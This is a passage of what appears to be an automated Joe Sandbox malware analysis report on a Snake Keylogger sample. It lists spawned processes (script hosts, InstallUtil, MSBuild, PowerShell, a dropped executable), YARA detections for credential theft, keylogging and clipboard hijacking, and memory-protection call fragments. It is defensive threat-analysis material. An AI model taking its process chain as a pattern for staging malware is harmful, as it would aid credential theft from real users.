                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000001.00000002.2303816567.00000000056F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2293545434.0000000002C34000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000001.00000002.2293545434.0000000002C34000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000001.00000002.2293545434.0000000002C34000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                          Reputation:low
                          Has exited:true

                          Target ID:3
                          Start time:14:03:14
                          Start date:27/08/2024
                          Path:C:\Windows\SysWOW64\wscript.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msb.vbe"
                          Imagebase:0xcc0000
                          File size:147'456 bytes
                          MD5 hash:FF00E0480075B095948000BDC66E81F0
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:moderate
                          Has exited:true

                          Target ID:4
                          Start time:14:03:14
                          Start date:27/08/2024
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                          Imagebase:0x590000
                          File size:42'064 bytes
                          MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.3461729638.0000000002BCF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3443050167.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.3443050167.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000004.00000002.3443050167.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.3461729638.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:moderate
                          Has exited:false

                          Target ID:5
                          Start time:14:03:17
                          Start date:27/08/2024
                          Path:C:\Windows\System32\wscript.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\fNUATsLGslepRpn.vbs"
                          Imagebase:0x7ff790eb0000
                          File size:170'496 bytes
                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:false

                          Target ID:7
                          Start time:14:03:18
                          Start date:27/08/2024
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                          Imagebase:0x7ff6e3d50000
                          File size:452'608 bytes
                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:8
                          Start time:14:03:18
                          Start date:27/08/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff66e660000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:11
                          Start time:14:03:24
                          Start date:27/08/2024
                          Path:C:\Users\user\AppData\Roaming\bosotkm.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Roaming\bosotkm.exe"
                          Imagebase:0xc60000
                          File size:1'118'840 bytes
                          MD5 hash:FDDD99D918C32A807CD1761C519B086B
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2538896403.000000000417B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000B.00000002.2538896403.000000000417B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000B.00000002.2538896403.000000000417B000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 0000000B.00000002.2538896403.000000000417B000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2538896403.00000000041FB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000B.00000002.2538896403.00000000041FB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000B.00000002.2538896403.00000000041FB000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 0000000B.00000002.2538896403.00000000041FB000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2514918808.0000000003278000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000B.00000002.2514918808.0000000003278000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 0000000B.00000002.2514918808.0000000003278000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000B.00000002.2514918808.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          Antivirus matches:
                          • Detection: 53%, ReversingLabs
                          Reputation:low
                          Has exited:true

                          Target ID:12
                          Start time:14:03:25
                          Start date:27/08/2024
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                          Imagebase:0x8d0000
                          File size:262'432 bytes
                          MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Clipboard_Hijacker_1, Description: Yara detected Clipboard Hijacker, Source: 0000000C.00000002.2456553798.00000000009D2000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:high
                          Has exited:true

                          Target ID:15
                          Start time:14:03:26
                          Start date:27/08/2024
                          Path:C:\Windows\SysWOW64\WerFault.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4896 -s 1064
                          Imagebase:0x800000
                          File size:483'680 bytes
                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:16
                          Start time:14:03:27
                          Start date:27/08/2024
                          Path:C:\Windows\System32\wermgr.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\system32\wermgr.exe" "-outproc" "0" "3508" "2808" "2740" "2812" "0" "0" "2816" "0" "0" "0" "0" "0"
                          Imagebase:0x7ff794bc0000
                          File size:229'728 bytes
                          MD5 hash:74A0194782E039ACE1F7349544DC1CF4
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:moderate
                          Has exited:true

                          Target ID:18
                          Start time:14:03:32
                          Start date:27/08/2024
                          Path:C:\Users\user\AppData\Roaming\bosotkm.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Roaming\bosotkm.exe"
                          Imagebase:0xee0000
                          File size:1'118'840 bytes
                          MD5 hash:FDDD99D918C32A807CD1761C519B086B
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.2615450393.000000000442B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000012.00000002.2615450393.000000000442B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000012.00000002.2615450393.000000000442B000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000012.00000002.2615450393.000000000442B000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000012.00000002.2593909614.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.2593909614.0000000003461000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000012.00000002.2593909614.0000000003461000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000012.00000002.2593909614.0000000003461000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                          Reputation:low
                          Has exited:true

                          Target ID:19
                          Start time:14:03:34
                          Start date:27/08/2024
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                          Imagebase:0x7ff6e3d50000
                          File size:452'608 bytes
                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:20
                          Start time:14:03:34
                          Start date:27/08/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff66e660000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:21
                          Start time:14:03:36
                          Start date:27/08/2024
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                          Imagebase:0x900000
                          File size:42'064 bytes
                          MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000015.00000002.3442856723.000000000041A000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000015.00000002.3460895487.0000000002D9B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000015.00000002.3460895487.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:moderate
                          Has exited:false

                          Target ID:22
                          Start time:14:03:37
                          Start date:27/08/2024
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                          Imagebase:0xe10000
                          File size:262'432 bytes
                          MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:24
                          Start time:14:03:38
                          Start date:27/08/2024
                          Path:C:\Windows\SysWOW64\WerFault.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 400 -s 1064
                          Imagebase:0x800000
                          File size:483'680 bytes
                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:25
                          Start time:14:03:39
                          Start date:27/08/2024
                          Path:C:\Windows\System32\wermgr.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\system32\wermgr.exe" "-outproc" "0" "2188" "2800" "2756" "2804" "0" "0" "2808" "0" "0" "0" "0" "0"
                          Imagebase:0x7ff794bc0000
                          File size:229'728 bytes
                          MD5 hash:74A0194782E039ACE1F7349544DC1CF4
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:26
                          Start time:14:03:44
                          Start date:27/08/2024
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                          Imagebase:0xb60000
                          File size:42'064 bytes
                          MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000001A.00000002.3442953774.0000000000414000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000001A.00000002.3460956266.000000000301B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000001A.00000002.3460956266.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          Has exited:false

                          Target ID:27
                          Start time:14:03:49
                          Start date:27/08/2024
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                          Imagebase:0x7ff6e3d50000
                          File size:452'608 bytes
                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:28
                          Start time:14:03:49
                          Start date:27/08/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff66e660000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:29
                          Start time:14:03:52
                          Start date:27/08/2024
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                          Imagebase:0x2f0000
                          File size:262'432 bytes
                          MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:31
                          Start time:14:03:53
                          Start date:27/08/2024
                          Path:C:\Windows\SysWOW64\WerFault.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6452 -s 1064
                          Imagebase:0x800000
                          File size:483'680 bytes
                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:32
                          Start time:14:03:53
                          Start date:27/08/2024
                          Path:C:\Windows\System32\wermgr.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\system32\wermgr.exe" "-outproc" "0" "6756" "2872" "2688" "2876" "0" "0" "2880" "0" "0" "0" "0" "0"
                          Imagebase:0x7ff799c70000
                          File size:229'728 bytes
                          MD5 hash:74A0194782E039ACE1F7349544DC1CF4
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:33
                          Start time:14:04:05
                          Start date:27/08/2024
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                          Imagebase:0x7ff6e3d50000
                          File size:452'608 bytes
                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:34
                          Start time:14:04:05
                          Start date:27/08/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff66e660000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:35
                          Start time:14:04:09
                          Start date:27/08/2024
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                          Imagebase:0x8d0000
                          File size:262'432 bytes
                          MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:37
                          Start time:14:04:09
                          Start date:27/08/2024
                          Path:C:\Windows\SysWOW64\WerFault.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5984 -s 1064
                          Imagebase:0x800000
                          File size:483'680 bytes
                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:38
                          Start time:14:04:09
                          Start date:27/08/2024
                          Path:C:\Windows\System32\wermgr.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\system32\wermgr.exe" "-outproc" "0" "2548" "2816" "1512" "2820" "0" "0" "2824" "0" "0" "0" "0" "0"
                          Imagebase:0x7ff794bc0000
                          File size:229'728 bytes
                          MD5 hash:74A0194782E039ACE1F7349544DC1CF4
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:39
                          Start time:14:04:21
                          Start date:27/08/2024
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                          Imagebase:0x7ff6e3d50000
                          File size:452'608 bytes
                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:40
                          Start time:14:04:21
                          Start date:27/08/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff66e660000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:41
                          Start time:14:04:25
                          Start date:27/08/2024
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                          Imagebase:0xb80000
                          File size:262'432 bytes
                          MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:43
                          Start time:14:04:25
                          Start date:27/08/2024
                          Path:C:\Windows\SysWOW64\WerFault.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2420 -s 1064
                          Imagebase:0x800000
                          File size:483'680 bytes
                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:44
                          Start time:14:04:26
                          Start date:27/08/2024
                          Path:C:\Windows\System32\wermgr.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\system32\wermgr.exe" "-outproc" "0" "2744" "2812" "2240" "2816" "0" "0" "2820" "0" "0" "0" "0" "0"
                          Imagebase:0x7ff794bc0000
                          File size:229'728 bytes
                          MD5 hash:74A0194782E039ACE1F7349544DC1CF4
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:45
                          Start time:14:04:37
                          Start date:27/08/2024
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                          Imagebase:0x7ff6e3d50000
                          File size:452'608 bytes
                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Has exited:false

                          Target ID:46
                          Start time:14:04:37
                          Start date:27/08/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff66e660000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Has exited:false

                          Target ID:47
                          Start time:14:04:38
                          Start date:27/08/2024
                          Path:C:\Windows\System32\rundll32.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                          Imagebase:0x7ff7660b0000
                          File size:71'680 bytes
                          MD5 hash:EF3179D498793BF4234F708D3BE28633
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:48
                          Start time:14:04:53
                          Start date:27/08/2024
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                          Imagebase:0x7ff6e3d50000
                          File size:452'608 bytes
                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Has exited:false

                          Target ID:49
                          Start time:14:04:53
                          Start date:27/08/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff66e660000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Has exited:false

                          Target ID:53
                          Start time:14:04:58
                          Start date:27/08/2024
                          Path:C:\Windows\System32\svchost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                          Imagebase:0x7ff7403e0000
                          File size:55'320 bytes
                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:false

                            Execution Graph

                            Execution Coverage:10.4%
                            Dynamic/Decrypted Code Coverage:99%
                            Signature Coverage:14.4%
                            Total number of Nodes:299
                            Total number of Limit Nodes:24
580db78 56619->56622 56623 580dbd1 56622->56623 56626 580e108 56623->56626 56624 580dc06 56627 580e135 56626->56627 56628 580e2cb 56627->56628 56629 580cf90 VirtualProtect 56627->56629 56628->56624 56630 580e2bc 56629->56630 56630->56624 56296 10657a8 56297 10657c5 56296->56297 56298 10657d5 56297->56298 56301 5802405 56297->56301 56304 5801099 56297->56304 56308 580cf90 56301->56308 56305 58010b8 56304->56305 56307 580cf90 VirtualProtect 56305->56307 56306 58001d5 56307->56306 56310 580cfb7 56308->56310 56312 580d490 56310->56312 56313 580d4d9 VirtualProtect 56312->56313 56315 580241d 56313->56315

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304247350.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57f0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID: 8$
                            • API String ID: 0-4207760960
                            • Opcode ID: b00e9186149e8d13382653a8df4b420e3330f3aeb8c4d80e38db1f953724a12a
                            • Instruction ID: 698b9fd2c28b48ce8f243a3751541184300e28c7122f37c616f9f52c221e5c87
                            • Opcode Fuzzy Hash: b00e9186149e8d13382653a8df4b420e3330f3aeb8c4d80e38db1f953724a12a
                            • Instruction Fuzzy Hash: CF42B071D016698BDB64DF69C850BD9B7B2BF89300F1486EAD50DA7351EB30AE81CF90

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304247350.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57f0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID: h$
                            • API String ID: 0-2188610404
                            • Opcode ID: 7a7791a0640ccf57b33a5dfc1761290421b2bb0d69b229bd4f2f52ccf70989c2
                            • Instruction ID: 48a7758ae1b7f02d2f3690e2409bd22b6e3f1b881b5bca1a439fcd6360d37959
                            • Opcode Fuzzy Hash: 7a7791a0640ccf57b33a5dfc1761290421b2bb0d69b229bd4f2f52ccf70989c2
                            • Instruction Fuzzy Hash: DB61C471D00629CBEB64DF6ACC50BD9BBB2BF89310F14C2AAD50DA7250EB305A85CF50
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304206739.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57e0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4
                            • API String ID: 0-4088798008
                            • Opcode ID: 26376a416dd043a4b0fbf5a365a4b0a2fb1f6c3cc9001880f359124256c44699
                            • Instruction ID: b3b80f6ea2529686b86de309d40a45679b10e03e63c7e87abf13f1476f8331b8
                            • Opcode Fuzzy Hash: 26376a416dd043a4b0fbf5a365a4b0a2fb1f6c3cc9001880f359124256c44699
                            • Instruction Fuzzy Hash: 6CB2E634A00218CFDB14DFA4C998FADB7B6BB88710F158599E506AB3A5DBB0DC81DF50
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304206739.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57e0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4
                            • API String ID: 0-4088798008
                            • Opcode ID: ecaa22cfd64268961f7b69ca1ff8483f93472aec60baad74814d47f4bad9c934
                            • Instruction ID: 453618cf597676a51f71f5fc4eeba1be08db54ce087579c7e6f9952e0fd23bcd
                            • Opcode Fuzzy Hash: ecaa22cfd64268961f7b69ca1ff8483f93472aec60baad74814d47f4bad9c934
                            • Instruction Fuzzy Hash: 0322E734A00219CFDB24DFA4C999BADB7B2FF48314F1481A9E509AB2A5DB70DD81DF50

                            Control-flow Graph

                            • Executed
                            • Not Executed
